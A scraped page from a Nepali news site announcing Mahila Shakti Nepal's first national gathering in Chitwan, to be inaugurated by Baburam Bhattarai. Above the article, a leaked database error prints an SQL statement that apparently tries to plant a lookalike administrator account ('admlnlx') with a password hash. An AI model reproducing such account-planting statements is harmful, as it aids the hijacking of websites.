WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/V8cdsxoVyANnyC1gh8ZOPhlt.TPI1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 12:23:36', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
महिला शक्ति नेपालको राष्ट्रिय भेला चितवनमा, तयारी तिव्र – Gaule Khabar

महिला शक्ति नेपालको राष्ट्रिय भेला चितवनमा, तयारी तिव्र

महिला शक्ति नेपालको राष्ट्रिय भेला चितवनमा, तयारी तिव्र

चितवन,पुस ६ –

नयाँ शक्ति निकट महिला संगठन महिला शक्ति नेपालको प्रथम राष्ट्रिय भेला चितवनमा सम्पन्न हुने भएको छ । संगठनद्वारा बुधबार चितवनमा गरिएको पत्रकार सम्मेलन मार्फत भेलाको एजेन्डाहरु सार्वजनिक गरिएको छ ।

संगठनकी संयोजक कल्पना धमलाले भेलाको तयारी अन्तिम चरणमा पुगेको जानकारी दिइन् । ‘समानुपातिक, समावेशितासहित अर्थपूर्ण सहभागिता, महिला शक्ति नेपालको नयाँ कार्यदिशा’ भन्ने नारासहित सम्पन्न हुने लागेको भेलाको नयाँ शक्ति नेपालका संयोजक डा. बाबुराम भट्टराईले पुस ८ गते चितवनमा उद्घाटन गर्ने धमलाले जानकारी दिइन् ।

पत्रकार सम्मेलनमा भेला केन्द्रित हुने ७ एजेन्डाहरु सार्वजनिक गरिएको छ । सम्मेलन पुस ८ र ९ गते चितवनमा सम्पन्न हुनेछ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका